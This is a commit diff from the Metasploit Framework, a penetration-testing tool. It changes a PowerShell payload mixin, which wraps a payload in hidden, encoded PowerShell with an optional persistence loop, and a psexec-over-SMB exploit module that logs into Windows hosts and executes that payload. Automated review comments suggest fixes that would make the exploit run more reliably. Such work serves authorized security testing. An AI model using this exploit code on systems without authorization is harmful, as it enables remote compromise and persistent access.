Merge branch 'powershell_import' of github.com:sempervictus/metasploit-framework into powershell_import
commit
2c850d8f8b
|
@ -11,7 +11,9 @@ module Exploit::Powershell
|
||||||
super
|
super
|
||||||
register_advanced_options(
|
register_advanced_options(
|
||||||
[
|
[
|
||||||
OptBool.new('RUN_WOW64', [
|
OptBool.new('PSH::PERSIST', [true, 'Run the payload in a loop', false]),
|
||||||
|
OptBool.new('PSH::OLD_METHOD', [true, 'Use powershell 1.0', false]),
|
||||||
|
OptBool.new('PSH::RUN_WOW64', [
|
||||||
false,
|
false,
|
||||||
'Execute powershell in 32bit compatibility mode, payloads need native arch',
|
'Execute powershell in 32bit compatibility mode, payloads need native arch',
|
||||||
false
|
false
|
||||||
|
@ -98,7 +100,7 @@ EOS
|
||||||
#
|
#
|
||||||
# Creates cmd script to execute psh payload
|
# Creates cmd script to execute psh payload
|
||||||
#
|
#
|
||||||
def cmd_psh_payload(pay, old_psh=false)
|
def cmd_psh_payload(pay, old_psh=datastore['PSH::OLD_METHOD'], wow64=datastore['PSH::RUN_WOW64'])
|
||||||
# Allow powershell 1.0 format
|
# Allow powershell 1.0 format
|
||||||
if old_psh
|
if old_psh
|
||||||
psh_payload = Msf::Util::EXE.to_win32pe_psh(framework, pay)
|
psh_payload = Msf::Util::EXE.to_win32pe_psh(framework, pay)
|
||||||
|
@ -106,14 +108,14 @@ EOS
|
||||||
psh_payload = Msf::Util::EXE.to_win32pe_psh_net(framework, pay)
|
psh_payload = Msf::Util::EXE.to_win32pe_psh_net(framework, pay)
|
||||||
end
|
end
|
||||||
# Run our payload in a while loop
|
# Run our payload in a while loop
|
||||||
if datastore['PERSIST']
|
if datastore['PSH::PERSIST']
|
||||||
fun_name = Rex::Text.rand_text_alpha(rand(2)+2)
|
fun_name = Rex::Text.rand_text_alpha(rand(2)+2)
|
||||||
sleep_time = rand(5)+5
|
sleep_time = rand(5)+5
|
||||||
psh_payload = "function #{fun_name}{#{psh_payload}};"
|
psh_payload = "function #{fun_name}{#{psh_payload}};"
|
||||||
psh_payload << "while(1){Start-Sleep -s #{sleep_time};#{fun_name};1};"
|
psh_payload << "while(1){Start-Sleep -s #{sleep_time};#{fun_name};1};"
|
||||||
end
|
end
|
||||||
# Determine appropriate architecture, manual method reduces script size
|
# Determine appropriate architecture, manual method reduces script size
|
||||||
ps_bin = datastore['RUN_WOW64'] ? '$env:windir\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
|
ps_bin = wow64 ? '$env:windir\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
|
||||||
# Wrap in hidden runtime
|
# Wrap in hidden runtime
|
||||||
psh_payload = run_hidden_psh(psh_payload,ps_bin)
|
psh_payload = run_hidden_psh(psh_payload,ps_bin)
|
||||||
# Convert to base64 for -encodedcommand execution
|
# Convert to base64 for -encodedcommand execution
|
||||||
|
|
|
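Review bot: `if datastore['PSH::PERSIST']` is now the only datastore read left inside cmd_psh_payload, whereas old_psh and wow64 in the new signature (hunk @-98) became parameters that merely default from the datastore; a caller that passes explicit flags still gets the looping behaviour decided by the module's option, which is inconsistent and harder to exercise from a test. Suggest a third parameter in the same form, `def cmd_psh_payload(pay, old_psh=datastore['PSH::OLD_METHOD'], wow64=datastore['PSH::RUN_WOW64'], persist=datastore['PSH::PERSIST'])`, with `if persist` on the loop guard. The header comment `# Creates cmd script to execute psh payload` should also name the three flags and state that each defaults to the corresponding advanced option registered in hunk @-11. The method body continues past the end of this hunk.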
@ -1,6 +1,14 @@
|
||||||
# -*- coding: binary -*-
|
# -*- coding: binary -*-
|
||||||
|
|
||||||
|
##
|
||||||
|
# This file is part of the Metasploit Framework and may be subject to
|
||||||
|
# redistribution and commercial restrictions. Please see the Metasploit
|
||||||
|
# web site for more information on licensing and terms of use.
|
||||||
|
# http://metasploit.com/
|
||||||
|
##
|
||||||
|
|
||||||
require 'msf/core'
|
require 'msf/core'
|
||||||
|
require 'msf/core/exploit/powershell'
|
||||||
|
|
||||||
class Metasploit3 < Msf::Exploit::Remote
|
class Metasploit3 < Msf::Exploit::Remote
|
||||||
Rank = ManualRanking
|
Rank = ManualRanking
|
||||||
|
@ -8,8 +16,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
# Exploit mixins should be called first
|
# Exploit mixins should be called first
|
||||||
include Msf::Exploit::Remote::SMB::Psexec
|
include Msf::Exploit::Remote::SMB::Psexec
|
||||||
include Msf::Exploit::Powershell
|
include Msf::Exploit::Powershell
|
||||||
include Msf::Auxiliary::Report
|
|
||||||
include Msf::Exploit::EXE
|
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
|
@ -29,7 +35,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
},
|
},
|
||||||
|
|
||||||
'Author' => [
|
'Author' => [
|
||||||
'RageLtMan <rageltman[at]sempervictus'
|
'Royce @R3dy__ Davis <rdavis[at]accuvant.com>', # PSExec command module
|
||||||
|
'RageLtMan <rageltman[at]sempervictus' # PSH exploit, libs, encoders
|
||||||
],
|
],
|
||||||
|
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
|
@ -48,9 +55,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Targets' =>
|
'Targets' =>
|
||||||
[
|
[
|
||||||
[ 'Automatic', { } ],
|
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
|
||||||
|
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
|
||||||
],
|
],
|
||||||
'DefaultTarget' => 0,
|
'DefaultTarget' => 0,
|
||||||
|
'DisclosureDate' => 'Jan 01 1999',
|
||||||
'References' => [
|
'References' => [
|
||||||
[ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
|
[ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
|
||||||
[ 'OSVDB', '3106'],
|
[ 'OSVDB', '3106'],
|
||||||
|
@ -61,43 +70,45 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
))
|
))
|
||||||
|
|
||||||
register_options([
|
register_options([
|
||||||
OptBool.new('PERSIST', [false, 'Run the payload in a loop']),
|
|
||||||
OptBool.new('PSH_OLD_METHOD', [false, 'Use powershell 1.0', false]),
|
|
||||||
OptBool.new('DryRun',[false,'dry run',false]),
|
OptBool.new('DryRun',[false,'dry run',false]),
|
||||||
], self.class)
|
], self.class)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
command = cmd_psh_payload(payload.encoded,datastore['PSH_OLD_METHOD'])
|
command = cmd_psh_payload(payload.encoded)
|
||||||
if datastore['DryRun']
|
if datastore['DryRun']
|
||||||
print_good command
|
print_good command
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
#Try and authenticate with given credentials
|
if datastore['PSH::RUN_WOW64'] and target_arch.first == "x86_64"
|
||||||
|
fail_with(Exploit::Failure::BadConfig, "Select an x86 target and payload with RUN_WOW64 enabled")
|
||||||
|
end
|
||||||
|
|
||||||
|
# Try and authenticate with given credentials
|
||||||
if connect
|
if connect
|
||||||
begin
|
begin
|
||||||
smb_login
|
smb_login
|
||||||
rescue StandardError => autherror
|
rescue StandardError => autherror
|
||||||
print_error("#{peer} - Unable to authenticate with given credentials: #{autherror}")
|
fail_with(Exploit::Failure::NoAccess, "#{peer} - Unable to authenticate with given credentials: #{autherror}")
|
||||||
return
|
ensure
|
||||||
|
disconnect
|
||||||
end
|
end
|
||||||
# Execute the powershell command
|
# Execute the powershell command
|
||||||
begin
|
|
||||||
print_status("#{peer} - Executing the payload...")
|
print_status("#{peer} - Executing the payload...")
|
||||||
#vprint_good(command)
|
begin
|
||||||
return psexec(command)
|
return psexec(command)
|
||||||
rescue StandardError => exec_command_error
|
rescue StandardError => exec_command_error
|
||||||
print_error("#{peer} - Unable to execute specified command: #{exec_command_error}")
|
fail_with(Exploit::Failure::Unknown, "#{peer} - Unable to execute specified command: #{exec_command_error}")
|
||||||
return false
|
ensure
|
||||||
end
|
|
||||||
disconnect
|
disconnect
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
end
|
||||||
|
|
||||||
def peer
|
def peer
|
||||||
return "#{rhost}:#{rport}"
|
return "#{rhost}:#{rport}"
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
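Review bot: The `ensure`/`disconnect` added after `smb_login` runs on the success path too, so the SMB session is torn down before `return psexec(command)` a few lines later; unless psexec re-establishes the session itself (not visible here), the command is sent over a connection that has already been closed. The execution block already ends with `ensure` / `disconnect`, so the login block's `ensure` and `disconnect` lines should be dropped; if the NoAccess path then needs its own teardown, call `disconnect` inside that rescue before `fail_with` rather than in an ensure. Minor, same function: `if datastore['PSH::RUN_WOW64'] and target_arch.first == "x86_64"` should use `&&` instead of `and`, and its message refers to `RUN_WOW64` while the option registered is `PSH::RUN_WOW64`.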